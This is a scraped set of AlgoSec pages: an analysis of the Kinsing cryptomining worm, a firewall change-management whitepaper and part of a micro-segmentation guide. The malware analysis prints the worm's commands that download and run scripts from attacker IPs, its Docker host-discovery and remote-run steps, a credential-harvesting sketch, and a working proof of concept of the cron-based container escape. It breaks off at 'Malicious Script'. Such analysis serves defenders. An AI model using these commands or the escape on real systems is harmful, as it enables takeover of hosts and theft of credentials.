  • AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers

    Cloud Security | Rony Moshkovich | 2 min read | Published 8/22/20

    We all remember how, a decade ago, Windows password trojans harvested credentials that some email and FTP clients kept on disk in unencrypted form. Network-aware worms brute-forced the credentials of weakly restricted shares to propagate across networks. Some of them piggy-backed on the Windows Task Scheduler to activate remote payloads. Today, it's déjà vu all over again, only in the world of Linux.

    As reported earlier this week by Cado Security, a new fork of the Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we break down some of its components and take a closer look at its modus operandi. As it turns out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let's start with its simplest trick: the credentials grabber.

    AWS Credentials Grabber

    If you use cloud services, chances are you have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its access type as Programmatic access, the console provides you with the Access key ID and Secret access key of the newly created IAM user. You then use those credentials to configure the AWS Command Line Interface (CLI) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same results programmatically with the AWS CLI. There is one little caveat, though.
    AWS CLI stores your credentials in a clear-text file called ~/.aws/credentials. The documentation explains this clearly: "The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory." That means your cloud infrastructure is now only as secure as your local computer. It was only a matter of time before the bad guys noticed such low-hanging fruit and used it for profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server.

    Hosting

    For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net runs an obsolete version of SugarCRM that is vulnerable to exploits. The attackers compromised this server, installed the b374k webshell, and then uploaded several malicious files to it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236, where the worm hosts its own body, is a vulnerable Docker host.
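    Returning to the AWS credentials grabber for a moment: to appreciate how low-hanging this fruit is, here is a hypothetical sketch of the kind of enumeration a grabber could use. This is not the malware's actual code; it runs against a throwaway directory tree rather than real home directories, and the key values are the placeholder examples from the AWS documentation.

```shell
# Hypothetical credentials-grabber sketch (NOT the malware's actual code).
# It scans a throwaway directory tree instead of real home directories.
DEMO=$(mktemp -d)
mkdir -p "$DEMO/home/alice/.aws"
cat > "$DEMO/home/alice/.aws/credentials" <<'EOF'
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
EOF

# The malware would walk /home and /root here instead of "$DEMO/home":
FOUND=$(find "$DEMO/home" -type f -path '*/.aws/credentials')

# A real grabber would now upload each found file to its C2 server;
# we only show that the secrets sit there in clear text:
grep 'aws_access_key_id' "$FOUND"
rm -rf "$DEMO"
```

    The point of the sketch is that no privilege escalation or decryption is needed: any process running as a user (or as root, for all users) can read these files directly.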
    According to Shodan, this server currently hosts a malicious Docker container image, system_docker, which is spun up with the following parameters:

    ./nigix --tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x --currency monero --httpd 8080

    A history of the executed container images suggests this host has run multiple malicious scripts under an instance of the alpine container image:

    chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh'
    chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh'
    chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh'
    chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh'

    Docker Lan Pwner

    A special module called docker lan pwner is responsible for propagating the infection to other Docker hosts. To understand the mechanism behind it, it is important to remember that an unprotected Docker host effectively acts as a backdoor trojan. Configuring the Docker daemon to listen for remote connections is easy: all it requires is one extra entry, -H tcp://127.0.0.1:2375, in the systemd unit file or in daemon.json. Once configured and restarted, the daemon exposes port 2375 to remote clients:

    $ sudo netstat -tulpn | grep dockerd
    tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd

    To attack other hosts, the malware collects the network segments of all network interfaces with the help of the ip route show command. For example, for an interface with the assigned IP 192.168.20.25, the range of all available hosts on that network can be expressed in CIDR notation as 192.168.20.0/24.
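    The segment-collection step described above can be sketched as follows. To keep the sketch runnable anywhere, $ROUTES holds canned ip route show output; a live run would populate it from the real command. The exact parsing the worm uses is not published, so the awk filter here is only an illustration of the idea.

```shell
# Sketch of the segment-collection step. $ROUTES is canned `ip route show`
# output; a live run would use: ROUTES=$(ip route show)
ROUTES='default via 192.168.20.1 dev eth0
192.168.20.0/24 dev eth0 proto kernel scope link src 192.168.20.25'

# Keep only directly connected networks, which already appear in CIDR
# notation as the first field of their route entry:
SEGMENTS=$(printf '%s\n' "$ROUTES" | awk '$1 ~ /^[0-9]+\..*\// {print $1}')
echo "$SEGMENTS"
```

    Each CIDR block collected this way becomes an input to the masscan probe described next.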
    For each collected network segment, it launches the masscan tool to probe every IP address in the segment on the following ports:

    2375   docker              Docker REST API (plain text)
    2376   docker-s            Docker REST API (SSL)
    2377   swarm               RPC interface for Docker Swarm
    4243   docker              old Docker REST API (plain text)
    4244   docker-basic-auth   authentication for the old Docker REST API

    The scan rate is set to 50,000 packets per second. For example, running masscan over the CIDR block 192.168.20.0/24 on port 2375 may produce output similar to:

    $ masscan 192.168.20.0/24 -p2375 --rate=50000
    Discovered open port 2375/tcp on 192.168.20.25

    From the output above, the malware selects the word at the 6th position, which is the detected IP address. Next, the worm runs zgrab, a banner-grabber utility, to send an HTTP request for "/v1.16/version" to the selected endpoint. Sending such a request to a local instance of the Docker daemon returns the daemon's version banner as a JSON document. Next, it applies the grep utility to the contents returned by zgrab, making sure the returned JSON contains either the "ApiVersion" or the "client version 1.16" string; the latest version of the Docker daemon will have "ApiVersion" in its banner. Finally, it applies jq, a command-line JSON processor, to parse the JSON, extract the "ip" field, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses of hosts that run the Docker daemon and are located in the same network segments as the victim.
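    The parsing stages of this discovery pipeline can be sketched with canned output, so the sketch runs without masscan or zgrab installed. The $BANNER JSON shape is an assumption for illustration; a real zgrab response carries more fields, and the worm uses jq rather than plain shell expansion for the final extraction.

```shell
# Sketch of the discovery pipeline's parsing steps, using canned output.
# A live run would invoke masscan and zgrab instead of these variables.
SCAN='Discovered open port 2375/tcp on 192.168.20.25'

# Step 1: take the 6th whitespace-separated word of the masscan line,
# which is the responding IP address:
IP=$(printf '%s\n' "$SCAN" | awk '/Discovered open port/ {print $6}')

# Step 2: the banner check. $BANNER stands in for zgrab's response to a
# GET /v1.16/version request (illustrative JSON shape, not real output):
BANNER='{"ip":"192.168.20.25","data":{"ApiVersion":"1.40"}}'
if printf '%s' "$BANNER" | grep -q -e 'ApiVersion' -e 'client version 1.16'; then
    # Host appears to run a Docker daemon; add it to the target list.
    echo "$IP"
fi
```

    Only hosts that survive the grep filter make it onto the worm's target list for the attack stage that follows.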
    For each returned IP address, it attempts to connect to the Docker daemon listening on one of the enumerated ports and instructs it to download and run the specified malicious script:

    docker -H tcp://[IP_ADDRESS]:[PORT] run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "curl [MALICIOUS_SCRIPT] | bash; ..."

    The malicious script employed by the worm allows it to execute code directly on the host, effectively escaping the boundaries imposed by the Docker container. We'll get to this trick in a moment. For now, let's break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute the legitimate alpine image with the following parameters:

    - the --rm switch causes Docker to automatically remove the container when it exits
    - -v /:/mnt is a bind-mount parameter that instructs the Docker runtime to mount the host's root directory / inside the container as /mnt
    - chroot /mnt changes the root directory of the current running process to /mnt, which corresponds to the root directory / of the host
    - a malicious script is downloaded and executed

    Escaping From the Docker Container

    The malicious script downloaded and executed within the alpine container first checks whether the user's crontab, a special configuration file that specifies shell commands to run periodically on a given schedule, contains the string "129[.]211[.]98[.]236":

    crontab -l | grep -e "129[.]211[.]98[.]236" | grep -v grep

    If it does not contain such a string, the script sets up a new cron job:

    echo "setup cron"
    ( crontab -l 2>/dev/null; echo "* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1" ) | crontab -

    The snippet above suppresses the "no crontab for username" message and creates a new scheduled task to be executed every minute. The scheduled task consists of two parts: download and execute the malicious script, then delete all scheduled tasks from the crontab.
    This effectively executes the scheduled task only once, with a delay of up to one minute. After that, the container quits. There are two important points associated with this trick:

    - because the container's root directory was mapped to the host's root directory /, any task scheduled inside the container is automatically scheduled in the host's root crontab
    - because the Docker daemon runs as root, a remote non-root user that follows these steps creates a task in root's crontab, to be executed as root

    Building a PoC

    To test this trick in action, let's create a shell script that prints "123" into a file _123.txt located in the root directory /:

    echo "setup cron"
    ( crontab -l 2>/dev/null; echo "* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1" ) | crontab -

    Next, let's pass this script, encoded in base64, to the Docker daemon running on the local host:

    docker -H tcp://127.0.0.1:2375 run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "echo '[OUR_BASE_64_ENCODED_SCRIPT]' | base64 -d | bash"

    Upon execution of this command, the alpine image starts and quits. This can be confirmed by the empty list of running containers:

    $ docker -H tcp://127.0.0.1:2375 ps
    CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES

    An important question now is whether the crontab job was created inside the (now destroyed) Docker container or on the host. Checking root's crontab on the host tells us that the task was scheduled for the host's root, to be run on the host:

    $ sudo crontab -l
    * * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1

    A minute later, the file _123.txt shows up in the host's root directory, and the scheduled entry disappears from root's crontab on the host:

    $ sudo crontab -l
    no crontab for root

    This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host.
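    The payload-wrapping step of the PoC can be sketched in isolation. The snippet below only demonstrates the base64 round-trip of the cron-installing one-liner so it can pass safely through the nested /bin/sh -c invocation; nothing is executed and no cron job is installed.

```shell
# Sketch of the PoC's payload-wrapping step: encode the cron-installing
# script so it survives quoting inside docker's /bin/sh -c argument.
PAYLOAD='( crontab -l 2>/dev/null; echo "* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1" ) | crontab -'

# Encode (strip newlines so the result is a single shell-safe token):
ENCODED=$(printf '%s' "$PAYLOAD" | base64 | tr -d '\n')

# On the target, the container would run: echo "$ENCODED" | base64 -d | bash
# Here we only decode, to show the round-trip is lossless:
DECODED=$(printf '%s' "$ENCODED" | base64 -d)
[ "$DECODED" = "$PAYLOAD" ] && echo "round-trip ok"
```

    Wrapping the payload this way sidesteps the quoting problems that would otherwise arise from passing a string full of quotes, asterisks, and redirections through two layers of shell.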
    By using the cron job trick, the malware manipulates the Docker daemon into executing malware directly on the host!

    Malicious Script

    Upon escaping from the container to be executed directly on a remote compromised host, the malicious script performs a series of further actions.

  • Firewall rule automation & change management explained | AlgoSec

    Learn about firewall rule automation and change management to streamline processes, reduce human error, and enhance network security with effective change controls.

    Overview

    In today's IT environment, the only constant is change. Not only is change rampant, but it often occurs at breakneck speed. Rapid business growth from mergers and acquisitions, development of new and de-commissioning of old applications, new users, micro-segmentation, cloud migrations and more make for a dynamic environment that poses new security challenges all the time.

    Introduction

    For a variety of reasons (rapid business growth from mergers and acquisitions, development of new applications, de-commissioning of old applications, new users, evolving networks and evolving cyberthreats) business needs change and, as they do, so must security policies. But change comes with challenges, often leading to major headaches for IT operations and security teams. The headaches sometimes develop into huge business problems:

    - Manual workflows and change management processes are time-consuming and prevent IT from keeping up with the required business agility
    - Improper management of even minor changes can lead to serious business risks, ranging from blockage of legitimate traffic all the way to taking the entire network offline

    Some organizations have grown so wary of change control and its potential negative impact that they resort to network freezes during peak business times rather than attempt to implement an urgent change in their network security policies. AlgoSec has another point of view. We want to help you embrace change through process improvement, identifying areas where automation and actionable intelligence can simultaneously enhance security and business agility, without the headaches.
    Herein, you will learn the secrets of elevating your firewall change management from manual, labor-intensive work to a fully automated change management process.

    Why is it so hard to make changes to network policies?

    Placing a sticky note on your firewall administrator's desk and expecting the change request to be performed pronto does not constitute a formal policy. Yet, shockingly, this is common practice. A formal change request process is in order. Such a process dictates clearly defined and documented steps for how a change request is to be handled, by whom, within what SLA, and more.

    Using IT ticketing systems

    Popular IT ticketing systems, like ServiceNow and Remedy, are a good place to manage your firewall change requests. However, these systems are built for tracking general requests and were never designed for handling complex requests such as opening a network flow from server A to server B or revising user groups.

    Informal change processes

    Having a policy state "this is what we must do" is a start, but without a formal set of steps for carrying out and enforcing that policy, you still have a long way to go toward smoothing out your change processes. In fact, the main challenges of managing network security devices include:

    - Time-consuming manual processes
    - Poor change-management processes
    - Error-prone processes

    Firewall change management requires detailed and concise steps that everyone understands and follows. Exceptions must be approved and documented, continuously improving the process over time.

    Communication breakdown

    Network security and operations staff work in separate silos. Their goals, and even their languages, are different. Working in silos is a clear recipe for trouble.
    It is a major contributor to out-of-band (unexpected) changes, which are notorious for resulting in out-of-service incidents. In many large companies, routine IT operational and administrative tasks may be handled by a team other than the one that handles security and risk-related tasks. Although both teams work toward the same goal, the smooth operation of the digital side of the business, decisions and actions made by one team may lead to problems for the other. Sometimes, these situations are alleviated in a rush with the good intention of dealing with security issues "later." But this crucial "later" never arrives, and the network remains open to breaches. In fact, according to a large-scale survey of our own customers, out-of-process firewall changes resulted in system outages for a majority of them. In addition, our customers pointed out that out-of-process changes have caused exposure to data breaches and costly audit failures.

    How will you know if it's broken?

    It is imperative to know what the business is up against from the perspective of threats and vulnerabilities. What is often overlooked, however, is the no-less-devastating impact of poorly managed firewall changes. Without carefully analyzing how even the most minor firewall changes will impact the network environment, businesses can suffer dramatic problems. Without thoughtful analysis, they might not know:

    - What does the change do to vital visibility across the network?
    - Which applications and connections are broken by this change?
    - Which new security vulnerabilities are introduced?
    - How will performance be affected?
    A lot of money and effort is put into keeping the bad guys out, while forgetting that "we have seen the enemy and he is us."

    Network complexity is a security killer

    Renowned security expert Bruce Schneier has stated, "Complexity is the worst enemy of security." The sheer complexity of any given network can lead to a lot of mistakes, especially when it comes to multiple firewalls with complex rule sets. Simplifying the firewall environment and its management processes is a prerequisite for good management.

    Did you know? Up to 30 percent of implemented rule changes in large firewall infrastructures are unnecessary because the firewalls already allow the requested traffic. Under time pressure, firewall administrators often create rules that turn out to be redundant given already-existing rules. This wastes valuable time and makes the firewalls even harder to manage.

    Mind the gap? Not if you want a good change management process

    The introduction of new things opens up security gaps. New hires, software patches, upgrades and network updates all increase risk exposure. The situation is further complicated in larger organizations, which may have a mixed security estate comprising traditional, next-generation and virtualized firewalls from multiple vendors across clouds and on-premise data centers, all with hundreds of policies and thousands of rules. Who can keep track of it all?

    What about unexpected quick fixes that enable access to certain resources or capabilities? In many cases, a fix is made in a rush (after all, who wants a C-level exec breathing down their neck for access to the network from a new tablet RIGHT NOW?) without sufficient consideration of whether that change is allowable under current security policies, or whether it introduces new exposures. Sure, you can't predict when users will make change requests, but you can certainly prepare the process for handling those requests whenever they arise.
    Bringing both IT operations and security teams together to prepare game plans for these situations, and for other "knowns" such as network upgrades, change freezes, and audits, helps to minimize the risk of security gaps. What's more, there are solutions that automate day-to-day firewall management tasks and link these changes and procedures so that they are recorded as part of the change management plan. In fact, automated technologies can help bridge the gap between change management processes and what is really taking place. They enhance accuracy by removing people from the equation to a very large degree. For example, a sophisticated firewall- and topology-aware workflow system that can identify redundant and unneeded change requests can increase the productivity of the IT staff.

    IT operations and security groups are ultimately responsible for making sure that systems function properly so that business goals are continuously met. However, these teams approach business continuity from different perspectives. The security department's number one goal is to protect the business and its data, whereas the IT operations team is focused on keeping systems up and running. It is natural for these two teams to clash. Oftentimes, however, IT operations and security teams align their perspectives because both have a crucial ownership stake: the business has to keep running AND it has to be secure. But this kind of alignment of interests is easier said than done. To achieve it, organizations must re-examine current IT and security processes. Let's have a look at some examples of what happens when this alignment is missing.

    Real-life examples of good changes gone bad

    Example 1

    A classic lack of communication between the IT operations and security groups put XYZ Corporation at risk.
    An IT department administrator, trying to be helpful, took the initiative to set up (on his own, with no security involvement or documentation) an FTP share for a user who needed to upload files in a hurry. By making this off-the-cuff change, the IT admin quickly addressed the client's request and the files were uploaded. However, the FTP account lingered, unsecured, well beyond its effective "use by" date. By the next day, the security team noticed large spikes of inbound traffic to the server from this very FTP account. Hackers abound: the FTP site had been compromised and was being exploited to host pirated movies.

    Example 2

    A core provider of e-commerce services to businesses in the U.S. suffered a horrible fate due to a simple, but poorly managed, firewall change. One day, all e-commerce transactions in and out of its network ceased, and the entire business was taken offline for several hours. The costs were astronomical. What happened? An out-of-band (and untested) change to a core firewall broke the communication between the e-commerce application and the internet. Business activity ground to a halt. Executive management got involved and the responsible IT staff members were reprimanded. Hundreds of thousands of dollars later, the root cause of the outage was uncovered: IT staff, oblivious to the consequences, chose not to test their firewall changes, bypassing their "burdensome" ITIL-based change management procedures.

    Tips from your own peers

    Taken from The Big Collection of Firewall Management Tips:

    Document, document, document. And when in doubt, document some more! "It is especially critical for people to document the rules they add or change so that other administrators know the purpose of each rule and whom to contact about it. Good documentation can make troubleshooting easy.
    It reduces the risk of service disruptions that inadvertently occur when an administrator deletes or changes a rule they do not understand." (Todd, InfoSec Architect, United States)

    "Keep a historical change log of your firewall policy so you can return to safe harbor in case something goes wrong. A proper change log should include the reason for the change, the requester and approval records." (Pedro Cunha, Engineer, Oni, Portugal)

    Taking the fire drill out of firewall changes

    Automation is the key. It helps staff disengage from firefighting and bouncing reactively between incidents. It helps them gain control. The right automation solution can help teams track down potential traffic or connectivity issues and highlight areas of risk. Administrators can get a handle on the current status of policy compliance across mixed estates of traditional, next-generation and virtualized firewalls, as well as hybrid on-prem and cloud estates. The solution can also automatically pinpoint the devices that may require changes and show how to create and implement those changes in the most secure way. Automation not only makes firewall change management easier and more predictable across large estates and multiple teams, but also frees staff to handle more strategic security and compliance tasks. Let the solution handle the heavy lifting and free up the staff for other things.

    To ensure a proper balance between business continuity and security, look for a firewall policy management solution that:

    - Measures every step of the change workflow so you can easily demonstrate that SLAs are being met
    - Identifies potential bottlenecks and risks BEFORE changes are made
    - Pinpoints change requests that require special attention

    Tips from your peers

    Taken from The Big Collection of Firewall Management Tips:

    "Perform reconciliation between change requests and actual performed changes. Looking at the unaccounted changes will always surprise you.
    Ensuring every change is accounted for will greatly simplify your next audit and help in day-to-day troubleshooting." (Ron, Manager, Australia)

    "Have a workflow process for implementing a security rule from the user requesting change, through the approval process and implementation." (Gordy, Senior Network Engineer, United States)

    10 steps to automating and standardizing the firewall change-management process

    Here is the secret to getting network security policy change management right. Once a request is made, the change-request process should include the following steps:

    1. Clarify the change request and determine the dependencies. Obtain all relevant information in the change request form (i.e., who is requesting the change and why).
    2. Get proper authorization for the change, matching it to specific devices and prioritizing it. Make sure you understand the dependencies and the impact on business applications, other devices and systems, etc. This usually involves multiple stakeholders from different teams.
    3. Validate that the change is necessary. AlgoSec research has found that up to 30% of changes are unnecessary. Weeding out redundant work can significantly improve IT operations and business agility.
    4. Perform a risk assessment. Before approving the change, thoroughly test it and analyze the results so as not to unintentionally open up the proverbial can of worms. Does the proposed change create a new risk in the security policy? You need to know this for certain BEFORE making the change.
    5. Plan the change. Assign resources, create and test your back-out plans, and schedule the change. Part of a good change plan involves having a backup plan in case a change goes unexpectedly wrong. This is also a good place in the process to ensure that everything is properly documented for troubleshooting or recertification purposes.
    6. Execute the change. Back up existing configurations, prepare the target device(s), notify appropriate workgroups of any planned outage, and perform the actual change.
    7. Verify correct execution to avoid outages. Test the change, including affected systems and network traffic patterns.
    8. Audit and govern the change process. Review the executed change and any lessons learned. Having a non-operations-related group conduct the audit provides the necessary separation of duties and ensures a documented audit trail for every change.
    9. Measure SLAs. Establish new performance metrics and obtain a baseline measurement.
    10. Recertify policies. While not necessary for every rule change, part of your change management process should include a review and recertification of policies at an interval that you define (e.g., once a year). Oftentimes, rules are temporary, needed only for a certain period of time, but they are left in place beyond their active date. This step forces you to review why policies are in place, enabling you to improve documentation and to remove or tweak rules to align with the business.

    In some cases (e.g., a data breach), a change to a firewall rule set must be made immediately; even with all the automation in the world, there is no time to go through the 10 steps. To address this type of situation, an emergency process should be defined and documented.

    Key capabilities to look for in a firewall change management solution

    Your workflow system must be firewall- and network-aware. This allows the system to gather the proper intelligence by pulling configuration information from the firewalls to understand the current policies. Ultimately, this reduces the time it takes to complete many of the steps within the change process. In contrast, a general change management system lacks this integration and thus provides no domain-specific expertise when it comes to making firewall rule changes.
    Your solution must support all of the firewalls and routers used within your organization. With the evolution of next-generation firewalls and new cloud devices, you should also consider how your plans fit into your firewall change-management decisions. In larger organizations, there are typically many firewalls from different vendors. If a solution cannot support all the devices in your environment (current and future), then it isn't the solution for you!

    Your solution must be topology-aware. The solution must:

    - Understand how the network is laid out
    - Comprehend how the devices fit and interact
    - Provide the necessary visibility into how traffic flows through the network

    Your solution must integrate with existing general change management systems. This is important so that you can maximize the return on previously made investments. You don't want to undergo a massive retraining on processes and systems simply because you have introduced a new solution. This integration allows users to continue using their familiar systems, but with the added intelligence of the firewall-aware visibility and understanding that the new solution delivers.

    Your solution must provide out-of-the-box change workflows to streamline change-management processes, and it must be highly customizable, since no two organizations' networks and change processes are exactly the same.
    Key workflow capabilities to look for in a solution:

    - Provide out-of-the-box change workflows to help you quickly tackle common change-request scenarios
    - Offer the ability to tailor the change process to your unique business needs by:
      - Creating request templates that define the information required to start a change process and pre-populate information where possible
      - Enabling parallel approval steps within the workflow, ideal when multiple approvals are required to process a change
      - Influencing the workflow according to dynamic information obtained during ticket processing (e.g., risk level, affected firewalls, urgency)
      - Ensuring accountability and increasing corporate governance with logic that routes change requests to specific roles throughout the workflow
    - Identify which firewalls and rules block requested traffic
    - Detect and filter unneeded/redundant requests for traffic that is already permitted
    - Provide "what-if" risk analysis to ensure compliance with regulations and policies
    - Automatically produce detailed work orders, indicating which new or existing rules to add or edit and which objects to create or reuse
    - Prevent unauthorized changes by automatically matching detected policy changes with request tickets and reporting on mismatches
    - Ensure that change requests have actually been implemented on the network, preventing premature closing of tickets

    Out-of-the-box workflow examples

    The best solutions allow for:

    - Adding new rules via a wizard-driven request process and flow that includes impact analysis, change validation and audit
    - Changing rules and objects by easily defining the requests for creation, modification and deletion, and identifying rules affected by suggested object modifications for best impact analysis
    - Removing rules by automatically retrieving a list of change requests related to the rule-removal request, notifying all requestors of the impending change, managing the approval process, and documenting and validating removal
    - Recertifying rules by automatically presenting all tickets with deadlines to the responsible party for recertification or rejection, and maintaining a full audit trail with actionable reporting

    Quantifying the ROI of firewall change-control automation

    Cut your costs

    Manual firewall change management is a time-consuming and error-prone process. Consider a typical change order that requires a total of four hours of work by several team members during the change lifecycle, including communication, validation, risk assessment, planning and design, execution, verification, documentation, auditing and measurement. Based on these assumptions, AlgoSec customers have reported significant cost savings (as much as 60%), achieved through:

    - A 50% reduction in processing time through automation
    - Elimination of the 30% of changes that are unnecessary
    - Elimination of the 8% of changes that are reopened due to incorrect implementation

    Summary

    While change management is complex, the decision for your business is actually simple. You can continue to slowly chug along with manual change management processes that drain your IT resources and impede agility. Or you can accelerate your processes with an automated network change-management workflow solution that aligns the different stakeholders involved in the process (network operations, network security, compliance, business owners, etc.) and helps the business run more smoothly.

    Think of your change process as a key component of the engine of an expensive car (in this case, your organization). Would you drive your car at high speed if you didn't have tested, dependable brakes or a steering wheel? Hopefully, the answer is no! The brakes and steering wheel are analogous to change controls and processes. Rather than slowing you down, they actually make you go faster, securely. Power steering and power brakes (in this case, firewall-aware integration and automation) help you zoom to success.

  • Micro-segmentation from strategy to execution | AlgoSec

Implement micro-segmentation effectively, from strategy to execution, to enhance security, minimize risks, and protect critical assets across your network.

Micro-segmentation from strategy to execution

Overview

Learn how to plan and execute your micro-segmentation project in AlgoSec's guide.

What is Micro-segmentation?

Micro-segmentation is a technique to create secure zones in networks. It lets companies isolate workloads from one another and introduce tight controls over internal access to sensitive data. This makes network security more granular. Micro-segmentation is an "upgrade" to network segmentation. Companies have long relied on firewalls, VLANs, and access control lists (ACLs) to segment their networks. Network segmentation is a key defense-in-depth strategy, segregating and protecting company data and limiting attackers' lateral movement. Consider a physical intruder who enters a gated community. Despite having breached the gate, the intruder cannot freely enter the houses in the community because, in addition to the outside gate, each house has locks on its door. Micro-segmentation takes this a step further: even if the intruder breaks into a house, the intruder cannot access all the rooms.

Why Micro-segment?

Organizations frequently implement micro-segmentation to block lateral movement. Two common types of lateral movement are insider threats and ransomware. Insider threats are employees or contractors gaining access to data that they are not authorized to access. Ransomware is a type of malware attack in which the attacker locks and encrypts the victim's data and then demands a payment to unlock and decrypt it. If an attacker takes over one desktop or one server in your estate and deploys malware, you want to reduce the "blast radius" and make sure that the malware can't spread throughout the entire data center. And if you decide not to pay the ransom?
Datto's Global State of the Channel Ransomware Report informs us that:

- The cost of downtime is 23x greater than the average ransom requested in 2019.
- Downtime costs due to ransomware are up by 200% year-over-year.

The SDN Solution

With software-defined networks, such as Cisco ACI and VMware NSX, micro-segmentation can be achieved without deploying additional controls such as firewalls. Because the data center is software-driven, the fabric has built-in filtering capabilities. This means that you can introduce policy rules without adding new hardware. SDN solutions can filter flows both inside the data center (east-west traffic) and flows entering or exiting the data center (north-south traffic). The SDN technology supporting your data center eliminates many of the earlier barriers to micro-segmentation. Yet, although a software-defined fabric makes segmentation possible, there are still many challenges to making it a reality.

What is a Good Filtering Policy?

A good filtering policy has three requirements:

1. Allows all business traffic. The last thing you want is to write a micro-segmented policy and have it break necessary business communication, causing applications to stop functioning.
2. Allows nothing else. By default, all other traffic should be denied.
3. Future-proof. "More of the same" changes in the network environment shouldn't break rules. If you write your policies too narrowly, then any change in the network, such as a new server or application, could cause something to stop working. Write with scalability in mind.

How do organizations achieve these requirements? They need to know what the traffic flows are, as well as what should be allowed and what should be denied. This is difficult because most traffic is undocumented. There is no clear record of the applications in the data center and what network flows they depend on. To get accurate information, you need to perform a "discovery" process.
A Blueprint for Creating a Micro-segmentation Policy

Micro-segmentation Blueprint: Discovery

You need to find out which traffic needs to be allowed, and then you can decide what not to allow. Two common ways to implement a discovery process are traffic-based discovery and content-based discovery.

Traffic-Based Discovery

Traffic-based discovery is the process of understanding traffic flows: observe the traffic that is traversing the data center, analyze it, and identify the intent of the flows by mapping them to the applications they support. You can collect the raw traffic with a traffic sniffer/network TAP or use a NetFlow feed.

Content-Based or Data-Based Approach

In the content-based approach, you organize the data center systems into segments based on the sensitivity of the data they process. For example, an eCommerce application may process credit card information, which is regulated by the PCI DSS standard. Therefore, you need to identify the servers supporting the eCommerce application and separate them in your filtering policy.

Discovering traffic flows within a data center

Micro-segmentation Blueprint: Using NetFlow for Traffic Mapping

The traffic source on which it is easiest to base application discovery is NetFlow. Most routers and switches can be configured to emit a NetFlow feed without requiring the deployment of agents throughout the data center. The flows in the NetFlow feed are clustered into business applications based on recurring IP addresses and correlations in time. For example, if an HTTPS connection from a client at 172.7.1.11 to 10.3.3.3 is observed at 10 AM, and a PostgreSQL connection from the same 10.3.3.3 to 10.1.1.1 is observed 0.5 seconds later, it's clear that all three systems support a single application, which can be labeled with a name such as "Trading System".
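The shared-IP clustering idea above can be sketched with a simple union-find over flow records. This is an illustrative sketch, not AlgoSec's actual algorithm; the flow tuples mirror the example in the text, plus one unrelated flow:

```python
from collections import defaultdict

def cluster_flows(flows):
    """Group (src, dst, service) flow records into applications:
    two flows belong to the same application if they share an IP."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path compression
            x = parent[x]
        return x

    def union(a, b):
        parent[find(a)] = find(b)

    # Every flow links its source and destination IPs into one set
    for src, dst, _svc in flows:
        union(src, dst)

    clusters = defaultdict(list)
    for flow in flows:
        clusters[find(flow[0])].append(flow)
    return list(clusters.values())

flows = [
    ("172.7.1.11", "10.3.3.3", "HTTPS"),    # client -> web front end
    ("10.3.3.3", "10.1.1.1", "TCP/5432"),   # web front end -> PostgreSQL
    ("10.9.9.9", "10.8.8.8", "SMB"),        # unrelated flow
]
apps = cluster_flows(flows)
# The first two flows share 10.3.3.3, so they land in one "Trading System"-style
# cluster; the third flow forms a cluster of its own.
```

In practice, a real discovery engine would also use the time correlation described above; this sketch shows only the shared-IP grouping.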
Source → Destination, Service:
- 172.7.1.0/24 → 10.3.3.3 (TRADE SYS), HTTPS
- 10.3.3.3 (TRADE SYS) → 10.1.1.11 (DB), TCP/5432
- 10.3.3.7 (FOREX) → 10.1.1.11 (DB), TCP/5432

Identifying traffic flows in common, based on shared IP addresses

NetFlow often produces thousands of "thin flow" records (one IP to another IP), even for a single application. In the example above, there may be a NetFlow record for every client desktop. It is important to aggregate them into "fat flows" (e.g., one that allows all the clients in the 172.7.1.0/24 range). In addition to avoiding an explosion in the number of flows, aggregation also provides a higher-level understanding, as well as future-proofing the policies against fluctuations in IP address allocation. Using the discovery platform in the AlgoSec Security Management Suite to identify the flows, in combination with information from your firewalls, can help you decide where to put the boundaries of your segments and which policies to put in these filters.

Micro-segmentation Blueprint: Defining Logical Segments

Once you have discovered the business applications whose traffic is traversing the data center (using traffic-based discovery) and have also identified the data sensitivity (using a content-based approach), you are well positioned to define your segments. Bear in mind that all the traffic that is confined to a segment is allowed. Traffic crossing between segments is blocked by default, and needs to be explicitly allowed by a policy rule. There are two potential starting points:

